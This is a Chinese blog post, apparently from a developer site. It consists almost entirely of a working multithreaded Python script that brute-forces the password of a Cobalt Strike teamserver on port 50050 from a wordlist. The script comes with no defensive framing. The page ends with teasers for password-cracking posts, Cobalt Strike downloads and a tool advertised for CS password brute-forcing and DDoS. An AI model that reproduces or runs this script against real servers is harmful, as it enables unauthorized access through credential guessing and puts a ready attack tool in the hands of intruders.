socket c语言 密码爆破,cobalt strike爆破密码

最新推荐文章于 2023-03-08 17:47:01 发布
最新推荐文章于 2023-03-08 17:47:01 发布
阅读量366 收藏
点赞数
文章标签: socket c语言 密码爆破

import time,socket,ssl,argparse,concurrent.futures,sys

MIN_PYTHON = (3, 3)

if sys.version_info < MIN_PYTHON:

sys.exit("Python %s.%s or later is required.\n" % MIN_PYTHON)

parser = argparse.ArgumentParser()

parser.add_argument("host",

help="Teamserver address")

parser.add_argument("wordlist", nargs="?",

help="Newline-delimited word list file")

args = parser.parse_args()

class NotConnectedException(Exception):

def __init__(self, message=None, node=None):

self.message = message

self.node = node

class DisconnectedException(Exception):

def __init__(self, message=None, node=None):

self.message = message

self.node = node

class Connector:

def __init__(self):

self.sock = None

self.ssl_sock = None

self.ctx = ssl.SSLContext()

self.ctx.verify_mode = ssl.CERT_NONE

pass

def is_connected(self):

return self.sock and self.ssl_sock

def open(self, hostname, port):

self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

self.sock.settimeout(10)

self.ssl_sock = self.ctx.wrap_socket(self.sock)

if hostname == socket.gethostname():

ipaddress = socket.gethostbyname_ex(hostname)[2][0]

self.ssl_sock.connect((ipaddress, port))

else:

self.ssl_sock.connect((hostname, port))

def close(self):

if self.sock:

self.sock.close()

self.sock = None

self.ssl_sock = None

def send(self, buffer):

if not self.ssl_sock: raise NotConnectedException("Not connected (SSL Socket is null)")

self.ssl_sock.sendall(buffer)

def receive(self):

if not self.ssl_sock: raise NotConnectedException("Not connected (SSL Socket is null)")

received_size = 0

data_buffer = b""

while received_size < 4:

data_in = self.ssl_sock.recv()

data_buffer = data_buffer + data_in

received_size += len(data_in)

return data_buffer

def passwordcheck(password):

if len(password) > 0:

result = None

conn = Connector()

conn.open(args.host, 50050)

payload = bytearray(b"\x00\x00\xbe\xef") + len(password).to_bytes(1, "big", signed=True) + bytes(bytes(password, "ascii").ljust(256, b"A"))

conn.send(payload)

if conn.is_connected(): result = conn.receive()

if conn.is_connected(): conn.close()

if result == bytearray(b"\x00\x00\xca\xfe"): return password

else: return False

else: print("Do not have a blank password!!!")

passwords = []

if args.wordlist: passwords = open(args.wordlist).read().split("\n")

else:

for line in sys.stdin: passwords.append(line.rstrip())

if len(passwords) > 0:

attempts = 0

failures = 0

with concurrent.futures.ThreadPoolExecutor(max_workers=30) as executor:

future_to_check = {executor.submit(passwordcheck, password): password for password in passwords}

for future in concurrent.futures.as_completed(future_to_check):

password = future_to_check[future]

try:

data = future.result()

attempts = attempts + 1

if data:

print ("Successful Attack!!!")

print("Target Password: {}".format(password))

except Exception as exc:

failures = failures + 1

print('%r generated an exception: %s' % (password, exc))

else:

print("Password(s) required")

月亮在营业
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
C语言密码破解案例,精彩啊!
wyh15895833492的博客
04-17 2219
现代密码学发展到今天,应该来讲破解密码的可能性已经很低了,而且破解的方法比较单一,因为现在普遍采取不可逆的哈希加密方式(如md5、SHA-1、HMAC-MD5等等),无法通过反向计算破解密码,因此目前有效的密码破解方式仍然是哈希碰撞来暴力破解。 暴力破解的本质就是遍历所有可能,而且我们可优化的地方只能是策略层面的,也就是提高遍历所有情况的效率。不过今天我们要讲的的不是暴力破解,我...
简单密码破解
肉丸不肉
03-09 1467
Problem Description 密码是我们生活中非常重要的东东,我们的那么一点不能说的秘密就全靠它了。哇哈哈. 接下来渊子要在密码之上再加一套密码,虽然简单但也安全。 假设渊子原来一个BBS上的密码为zvbo941987,为了方便记忆,他通过一种算法把这个密码变换成YUANzi1987,这个密码是他的名字和出生年份,怎么忘都忘不了,而且可以明目张胆地放在显眼的地方而不被别人知道真正...
CobaltStrike密码爆破、伪造上线以及DDos——csIntruder
weixin_43526443的博客
03-08 2021
本项目包含CobaltStrike密码爆破、伪造上线以及DDos功能。其中伪造上线支持常见魔改版CS。
C/S爆破
转角万里路的专栏
11-17 795
Hydra 参数说明Hydra参数说明|—-|:—-| |参数|说明|
RAR密码暴力破解(含源码 C语言实现)
02-03
C语言实现 , 内置源码 , 通过外部config.txt进行相关配置 , 暴力破解是基于 7z 的压缩引擎 所以文件内的 7z.exe 不可以少 . 字符集可以自定义 注意字符顺序影响着破解效率
CobaltStrike4.4.zip
09-15
Cobalt Strike是一款备受瞩目的渗透测试工具,主要用于模拟高级威胁行为,帮助网络安全专业人士进行红队操作和评估网络防御的有效性。在这个"CobaltStrike4.4.zip"压缩包中,包含了多个与Cobalt Strike 4.4版本相关...
cobaltstrike中文版.zip
05-17
Cobalt Strike是一款高级的渗透测试工具,广泛用于模拟攻击和红队操作,以评估组织的安全防御能力。它由Mandiant公司开发,主要用于企业安全团队进行威胁模拟、漏洞利用和持续性威胁(APT)模拟。这个“cobaltstrike...
Cobalt Strike 4.5
最新发布
09-21
Cobalt Strike是一款超级好用的渗透测试工具,拥有多种协议主机上线方式,集成了提权,凭据导出,端口转发,socket代理,office攻击,文件捆绑,钓鱼等多种功能。同时,Cobalt Strike还可以调用Mimikatz等其他知名...
CobaltStrike4.8
05-30
使用方法 1、将server文件夹上传到java11环境的linux 然后使用以下命令启动(给teamserver和..../teamserver ip 密码 2、使用java11环境的windows 双击client文件夹下的Cobalt-client.cmd 即可启动 默认连接端口50050
cobalt strike 4.7
06-07
Cobalt Strike 4.7 是一款广泛应用在网络安全领域的高级渗透测试工具,它主要用于模拟攻击者行为,评估组织的安全防御能力。C2(Command and Control)工具是指远程控制服务器,Cobalt Strike 在此领域中扮演了核心...
C语言 多线程查找用户账户密码(内附大数据)
11-29
多线程查找用户账户密码,将找出来的数据保存在res.txt中,可以通过此来学习多线程,需要用360解压缩
凯撒密码加密、暴力解密
03-11
包括两个工程文件,一个是加密文件,输入需要加密的报文和偏移量即可。另外一个工程文件是暴力解密报文。
服务器地址_抓取cobaltstrike攻击者服务器地址骚操作
weixin_30616635的博客
12-17 479
以往分析木马文件的时候一般使用微步云沙箱去测试木马文件指向服务器地址,然后根据得到的IP去粗略的查看该IP是否为恶意。但是有时候会在客户内网环境里去做木马分析,这时候不能随时访问各种云沙箱了,工作中增加了些许阻力,今天突发奇想有个骚操作,也许能帮你省下查IP地址的时间。首先想到的工具当然是抓包神器wireshark,经过测试确实能抓取到CS的服务器地址,但是双击即运行,在...
初始破解之爆破
eldn__的专栏
10-11 1466
爆破就是通过修改软件机器码(汇编代码)达到绕过注册验证环节的目的   爆破中修改机器码通常都是修改跳转指令,而跳转指令实现与否多和标志寄存器相关(jmp,call除外),所以这里不得不复习下关于标志寄存器的内容: 标志位寄存器 标志位寄存器能够设置各位标志位,但某个位是否被置位或复位依赖于计算结果或别的事件的发生。我并不想在这里讨论标志寄存器中所有的标志位,我只讨论一些重要的位: ZF(
基于Socket进行远程攻击
qq_45616828的博客
10-27 184
P48
才学-简单端口爆破小脚本
weixin_33893473的博客
05-10 118
简单的脚本 #coding:utf-8 from socket import * import sys import threading import time #python scan_port.py <host> <start_port>-<end_port> lock = threadin...
团队协同作战渗透工具 CS神器Cobalt Strike
有勇气的牛排博客
02-14 1万+
Cobalt Strike是一款渗透测试工具,常被称为CS神器,从3.0开始不在使用Metaspoit的漏洞库,称为一个独立平台,它分为 客户端(可以是多个)和 服务端(一个)
c语言简易密码爆破
m0_56750162的博客
03-24 1326
代码如下,实现原理比较简单,通过读取txt文件密码本与内置好的密码口令进行对比 密码本可以在网页上找,也可以用这个密码字典下载-弱口令字典下载【密码字典】 -迷你下载站为大家分享这个弱口令字典文件,它列出了多款规则的密码,有需要的大神们可以参考下,这个字典制作的可不容易,先是把历来我自存的各类字典打包上传到服务器上花费了一天时间,感兴趣的用户可以下载测试。密码字典说...https://www.minixiazai.com/app/26724.html #include<iostream&gt.
借助7Z.exe 实现RAR压缩包密码暴力破解 C语言实现
热门推荐
刘之帅
03-19 5万+
吐槽几句rar压缩包暴力破解这种软件 , 原理上挺简单的其实 , 就是不断的用字符去碰 , 指不定啥时候能碰上 , 爆破破解不就是这么回事嘛 , 之前下载个学习资料 , 说好的童叟无欺, 结果却给我加了个解压密码 , 上网寻思查个破解软件吧 , 要么带病毒 , 要么不能用 , 要么收费 , 寻思寻思 , 自己写一个吧 , 反正这东西原理也不难……源码#include<iostream> #inclu
CobaltStrike渗透测试指南
"CobaltStrike.pdf - 一篇关于Cobalt Strike的详细教程文档,主要涵盖其简介、基本使用、模块介绍、脚本使用和扩展功能,特别提到了Malleable C2和External C2等内容。" Cobalt Strike是一款广泛应用于网络安全领域...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值